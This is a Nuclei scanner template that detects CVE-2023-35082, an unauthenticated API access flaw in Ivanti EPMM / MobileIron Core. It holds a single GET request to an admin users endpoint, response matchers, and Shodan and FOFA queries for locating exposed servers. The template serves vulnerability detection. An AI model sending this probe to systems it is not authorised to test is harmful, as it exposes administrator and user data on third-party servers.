nuclei-templates/http/cves/2023/CVE-2023-35082.yaml

50 lines
2.1 KiB
YAML
Raw Normal View History

2023-08-03 16:20:05 +00:00
id: CVE-2023-35082
info:
name: MobileIron Core - Remote Unauthenticated API Access
author: DhiyaneshDk
severity: critical
description: |
Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web applications security filter chain.
2023-09-27 15:51:13 +00:00
impact: |
Remote attackers can exploit this vulnerability to gain unauthorized access to sensitive data and perform malicious actions.
2023-09-06 11:43:37 +00:00
remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)
2023-08-03 16:20:05 +00:00
reference:
- https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2023-35082
- https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
2024-05-31 19:23:20 +00:00
- https://github.com/Chocapikk/CVE-2023-35082
- https://github.com/Ostorlab/KEV
2023-08-31 11:46:18 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-35082
cwe-id: CWE-287
2024-05-31 19:23:20 +00:00
epss-score: 0.96732
epss-percentile: 0.9966
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
2023-08-03 16:20:05 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: ivanti
product: endpoint_manager_mobile
shodan-query:
- http.favicon.hash:362091310
- http.favicon.hash:"362091310"
2023-09-06 11:43:37 +00:00
fofa-query: icon_hash="362091310"
2024-05-31 19:23:20 +00:00
tags: cve2023,cve,ivanti,mobileiron,epmm,kev
2023-08-03 16:20:05 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/mifs/asfV3/api/v2/admins/users"
max-size: 100
matchers:
- type: dsl
dsl:
- contains_all(body, 'results','userId','name')
- contains(header, 'application/json')
- status_code == 200
condition: and
# digest: 490a0046304402206702aa2fa81c73af6527e7787118ebadcf29180430928e3bc14653af8e998871022016579004bf1530a83e0640a0dcab8e5c6abc73598758d064bf917bfc3996d707:922c64590222798bb761d5b6d8e72950